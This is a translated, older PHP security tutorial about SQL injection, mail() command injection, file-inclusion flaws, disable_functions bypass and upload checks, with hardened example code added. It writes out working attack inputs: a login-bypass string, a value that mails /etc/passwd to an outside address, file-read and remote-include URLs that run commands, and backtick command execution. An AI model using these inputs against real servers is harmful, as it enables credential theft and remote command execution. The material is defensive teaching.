1. The old trick: spoofing SQL statements
In the default setup, even if you forget to copy php.ini to /usr/local/lib/php.ini, PHP still runs with magic_quotes_gpc = on.
In that case the single quote ('), double quote ("), backslash (\) and NUL (the null byte) in every variable coming from GET/POST/Cookie
get a backslash placed in front of them, so the database query is built correctly.
But php-4-RC2 introduced a configuration file called php.ini-optimized, and in the optimized php.ini
magic_quotes_gpc = off. Some administrators copy php.ini-optimized to
/usr/local/lib/php.ini, which is dangerous. Take a simple login check that filters none of the dangerous characters:
select * from login where user='$HTTP_POST_VARS[user]' and pass='$HTTP_POST_VARS[pass]'
We can enter 1' or 1='1 in both the user box and the password box. This is an antique trick; the statement
becomes the following:
select * from login where user='1' or 1='1' and pass='1' or 1='1'
Because or 1='1' is always true, the check passes.
The best fix is to filter out every unnecessary character; we recommend wrapping each GET/POST/Cookie variable that is used in SQL
with a custom function like this one:
function gpc2sql($str) {
    // magic_quotes_gpc has already escaped GET/POST/Cookie input; do not escape it twice
    if (get_magic_quotes_gpc() == 1)
        return $str;
    else
        return addslashes($str);
}
This matters if your program is to be ported securely to different systems, where magic_quotes_gpc may be on or off.
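The following is an added example, not code from the original article: it puts the gpc2sql() idea into a single choke point for building the login query, and shows what the classic 1' or 1='1 input turns into with and without escaping. The function names login_query_vulnerable() and login_query_escaped() are hypothetical, and the input is constructed inline rather than read from a request.

```php
<?php
// Added example (not from the original article). Escape every GET/POST/Cookie
// value through one function before it reaches SQL, and compare the query
// built from raw input with the one built from escaped input.

// Same idea as the article's gpc2sql(): escape only if magic_quotes did not.
function gpc2sql($str) {
    // get_magic_quotes_gpc() was removed in PHP 8; treat "missing" as "off".
    if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
        return $str;
    }
    return addslashes($str);
}

// Vulnerable form: raw interpolation of user input into the statement.
function login_query_vulnerable($user, $pass) {
    return "select * from login where user='$user' and pass='$pass'";
}

// Hardened form: every value passes through gpc2sql() first, so the quote in
// the input becomes \' and stays inside the string literal.
function login_query_escaped($user, $pass) {
    $u = gpc2sql($user);
    $p = gpc2sql($pass);
    return "select * from login where user='$u' and pass='$p'";
}

// Constructed input: the bypass string from the article. It is assigned here
// directly; on a real request with magic_quotes_gpc on, PHP would already have
// slashed it, which is exactly why gpc2sql() must only ever see GPC values.
$input = "1' or 1='1";
echo login_query_vulnerable($input, $input), "\n";
echo login_query_escaped($input, $input), "\n";
```

addslashes() is not aware of the connection character set, so for multibyte encodings the escaping can still be undone; on any PHP that supports them, parameterized queries (mysqli or PDO prepared statements) are the more robust form of the same fix.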
2. The fifth parameter of the mail function
In php-4.0.5 the mail function gained a fifth parameter, which sets additional command-line arguments passed when the mail is actually sent, but special shell characters in it are not checked, so this becomes a command execution vulnerability. Take the example from the manual:
mail('nobody@aol.com', 'the subject', $message, "From: webmaster@$SERVER_NAME", "-fwebmaster@$SERVER_NAME");
This is the vulnerability: if $SERVER_NAME is ;mail webjx@webjx.com </etc/passwd, the machine's password file is sent to my mailbox.
A reminder here: several examples in the PHP manual have security problems, so do not copy them verbatim. They only demonstrate the basic behavior of a function; understand them rather than reuse them.
For the mail function problem, the simplest approach is not to use the fifth parameter at all. If you must use it, filter out dangerous characters such as the semicolon (;). You can also patch the PHP source: in ext/standard/mail.c, before the line if (extra_cmd != NULL) { add the following line:
extra_cmd = NULL;
Then recompile.
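Here is an added example, not from the original article, of the filtering approach: the sender address is validated against a strict pattern before it is used to build the -f option, and the recipient and subject are checked for header-injecting line breaks. The functions valid_sender() and send_notice() are hypothetical names; the addresses used in the demonstration are constructed.

```php
<?php
// Added example (not from the original article): never pass raw input into
// the fifth argument of mail(). Validate the sender address first and build
// the "-f" option only from the validated value.

function valid_sender($addr) {
    // First character alphanumeric (so the value can never start with "-"),
    // then only the characters a plain local@domain address needs. Spaces,
    // ";", "|", "<", ">", quotes and newlines are all rejected.
    if (strlen($addr) > 254) {
        return false;
    }
    return preg_match('/^[A-Za-z0-9][A-Za-z0-9._+-]*@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$/', $addr) === 1;
}

function no_newlines($s) {
    // A CR or LF in To: or Subject: lets the caller inject extra headers.
    return strpos($s, "\r") === false && strpos($s, "\n") === false;
}

function send_notice($to, $subject, $message, $sender) {
    if (!valid_sender($sender) || !no_newlines($to) || !no_newlines($subject)) {
        return false;   // refuse to build headers or a command line from untrusted text
    }
    $headers = "From: $sender";
    return mail($to, $subject, $message, $headers, '-f' . $sender);
}

// Constructed inputs: the plain address passes; the injected one is rejected
// before mail() and therefore before sendmail is ever invoked.
var_dump(valid_sender('webmaster@example.com'));
var_dump(valid_sender('webmaster@example.com ;mail attacker@example.com </etc/passwd'));
var_dump(no_newlines("hello\r\nBcc: attacker@example.com"));
```

Later PHP releases pass this argument through escapeshellcmd() internally, but validating the value before it becomes part of a command line is still the right layer of defence, and it also catches the header-injection case that escapeshellcmd() does nothing about.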
3. require and include in the UNIX version
The require and include functions in the Windows version do not support including remote files over HTTP or FTP, while the UNIX version supports remote inclusion by default.
Whatever the extension of the included file, require and include treat its contents as part of the program.
When writing programs, many require or include calls are inevitably used for modularity and portability, and sometimes a variable is used as the argument, such as include("$something"); if the user can control $something and it is not filtered, the result is disastrous.
First, any file the web server user has read permission on can be viewed. Suppose the program is http://victim/test.php; then the following
URL shows the /etc/passwd file: http://victim/test.php?something=/etc/passwd
Second, commands can be executed through functions in a remote file. For example, I create a file test.php on www.AAA.org with the following content:
Then I can use this URL:
http://victim/test.php?something=http://www.xfocus.org/test.php?cmd=uname
to run the command.
phpMyAdmin has this vulnerability too, and it can be used to view any file. However, before the include it first calls file_exists() to check whether the file is there, and file_exists() does not support remote files, so the second method above cannot be used directly. It is still possible to request a URL containing PHP code so that it lands in the Apache log and then include the log file as the "file", which executes the code, but Apache logs are usually large and full of noise.
Another way is to upload a script that runs a local command. A file with a name like php8Ta02I is created in the server's upload temporary directory; because that file exists at that moment, the file_exists() check passes and the uploaded script can be executed.
Therefore be vigilant when using include and require, especially when the included file is specified by a parameter: the parameter must not be controllable by the user. You can also disable remote file inclusion in php.ini: earlier versions did this at build time with --disable-url-fopen-wrapper, later versions with allow_url_fopen = off.
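As an added example (not code from the original article or from phpMyAdmin), the following shows the pattern the last paragraph calls for: the user picks a module by name, the name is looked up in a fixed allowlist, and only the allowlisted local filename ever reaches include(). The directory, module names and the function resolve_module() are hypothetical.

```php
<?php
// Added example (not from the original article): a module switcher that maps
// a user-supplied name onto a fixed allowlist of local files, so the request
// parameter is never used as a path.

define('MODULE_DIR', dirname(__FILE__) . '/modules');   // hypothetical location

$allowed_modules = array(
    'news'    => 'news.inc.php',
    'contact' => 'contact.inc.php',
    'about'   => 'about.inc.php',
);

// Returns the path to include, or false when the request is not on the list.
// The returned value comes from the allowlist, not from the request, so
// neither "/etc/passwd", nor "http://...", nor "../" can ever be produced.
function resolve_module($name, $allowed) {
    if (!is_string($name) || !isset($allowed[$name])) {
        return false;
    }
    return MODULE_DIR . '/' . $allowed[$name];
}

// Constructed requests: only the first resolves; the others are rejected
// before include() ever sees them.
$requests = array(
    'news',
    '/etc/passwd',
    'http://example.com/test.php?cmd=uname',
    '../../index',
);
foreach ($requests as $r) {
    $path = resolve_module($r, $allowed_modules);
    echo str_pad($r, 40), ' => ', ($path === false ? 'rejected' : $path), "\n";
}

// How a page would use it (the module files are hypothetical, so this is not executed here):
// $page = isset($_GET['something']) ? $_GET['something'] : 'news';
// $path = resolve_module($page, $allowed_modules);
// if ($path !== false) { include $path; }
```

Combine this with the php.ini setting the article mentions, allow_url_fopen = Off, and on PHP 5.2 and later also allow_url_include = Off, which governs include/require of URLs specifically; the allowlist remains the primary control because it removes the user from the path decision entirely.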
4. disable_function
php-4.0.1 introduced the php.ini directive disable_functions, which is quite useful: you can use it to forbid certain functions.
For example, with disable_functions = passthru exec system popen in php.ini, calling one of these functions only produces the message that system() has been disabled for security reasons. Alas, that does not mean there is no way to run system commands: PHP borrows many Perl features, and the backtick (`) also executes a command:
<?php
$output = `ls -al`;   // backtick operator: runs the command and returns its output
echo "$output";
?>
The only way to stop this is safe_mode, but the hateful safe_mode imposes far too many limits, and other things may stop working.
5. File upload
The PHP file upload vulnerability was described in the article "upload".
Fortunately, php-4.0.3 added the is_uploaded_file and move_uploaded_file functions. So upload programs on php-4.0.3 and later must not use copy(); use move_uploaded_file() instead, which checks that the file really was uploaded. For php-4.0.2 and earlier we recommend adding the following function and calling it before copy:
function is_uploaded_file($filename) {
    // locate the upload temp directory from php.ini, falling back to the system temp dir
    if (!$tmp_file = get_cfg_var('upload_tmp_dir')) {
        $tmp_file = dirname(tempnam('', ''));
    }
    $tmp_file .= '/' . basename($filename);
    /* User might have trailing slash in php.ini... */
    return (ereg_replace('/+', '/', $tmp_file) == $filename);
}
This vulnerability has been known on SecurityFocus for a long time, but there are usually many checks before the copy operation, so it is quite hard to exploit in practice.
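The following is an added example, not code from the original article, of an upload handler written the way the section recommends: it relies on is_uploaded_file() and move_uploaded_file() instead of copy(), ignores the client-supplied path, allowlists the extension, and stores the file under a server-chosen name in a directory that is assumed not to be served by the web server. The directory path, the field layout and store_upload() are hypothetical; the $_FILES-style entry at the end is constructed.

```php
<?php
// Added example (not from the original article): an upload handler that
// performs the check copy() never did, and keeps every client-controlled
// value out of the destination path.

define('UPLOAD_DIR', '/var/www/uploads-private');   // assumed: outside the web root
$allowed_ext = array('jpg', 'png', 'gif', 'pdf');

// $file is one entry of $_FILES, e.g. $_FILES['userfile'].
// Returns the stored path, or false if anything about the upload is off.
function store_upload($file, $allowed_ext) {
    if (!isset($file['tmp_name'], $file['error'], $file['name'])
        || $file['error'] !== UPLOAD_ERR_OK) {
        return false;
    }
    // Was this path really produced by PHP's upload machinery for this
    // request? A forged tmp_name pointing at an existing server file fails here.
    if (!is_uploaded_file($file['tmp_name'])) {
        return false;
    }
    // Only the extension of the client's filename is consulted, and only if
    // it is on the allowlist; the rest of the name is discarded.
    $ext = strtolower(pathinfo(basename($file['name']), PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed_ext, true)) {
        return false;
    }
    // Server-chosen name (PHP 7+ random_bytes): nothing from the client
    // ends up in the path, so no traversal and no executable name.
    $target = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        return false;
    }
    return $target;
}

// Constructed $_FILES-style entry whose tmp_name was not uploaded by this
// request; is_uploaded_file() rejects it, so nothing is moved.
$fake = array(
    'name'     => 'evil.php',
    'tmp_name' => '/etc/passwd',
    'error'    => UPLOAD_ERR_OK,
);
var_dump(store_upload($fake, $allowed_ext));
```

The extension allowlist is a defence against the script-upload trick described in section 3 as much as against this section's copy() problem: even if the stored file is later referenced, it cannot carry a name the server would execute.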
Also, do not use environment variables, Cookie variables, session variables and the like as the basis for access decisions, because these variables are far too easy to forge.
Ha, there is a lot more of this at hand, and the rest will be added later. You are also welcome to add to and correct any of it in the same way.